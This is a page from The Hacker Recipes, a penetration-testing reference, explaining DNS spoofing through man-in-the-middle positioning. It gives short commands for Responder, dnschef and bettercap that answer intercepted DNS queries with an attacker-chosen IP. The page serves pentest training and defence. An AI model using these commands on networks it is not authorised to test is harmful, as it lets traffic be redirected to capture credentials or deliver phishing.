🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🍳 The Hacker Recipes / DNS spoofing

DNS spoofing

Theory

DNS is not multicast or broadcast like LLMNR, NBT-NS or mDNS. In order to answer DNS requests, attacker first need to receive them. For instance, this can be achieved with ARP spoofing or DHCPv6 spoofing. DNS spoofing is basically setting up a DNS server and answering DNS queries obtained through man-in-the-middle technique.

Practice

::: tabs

=== Responder

Responder's (Python) DNS server feature can be used to answer DNS queries.

responder --interface "eth0"
responder -I "eth0"

=== dnschef

dnschef (Python) can be used as a DNS server. 

dnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log

=== bettercap

In order to spoof DNS requests, bettercap (Go) can be used. This tool can also be used for the first step of ARP spoofing or DHCPv6 spoofing. 

set dns.spoof.domains $DOMAIN_FQDN
set dns.spoof.all true
dns.spoof on

:::

Resources

https://www.bettercap.org/modules/ethernet/spoofers/dns.spoof/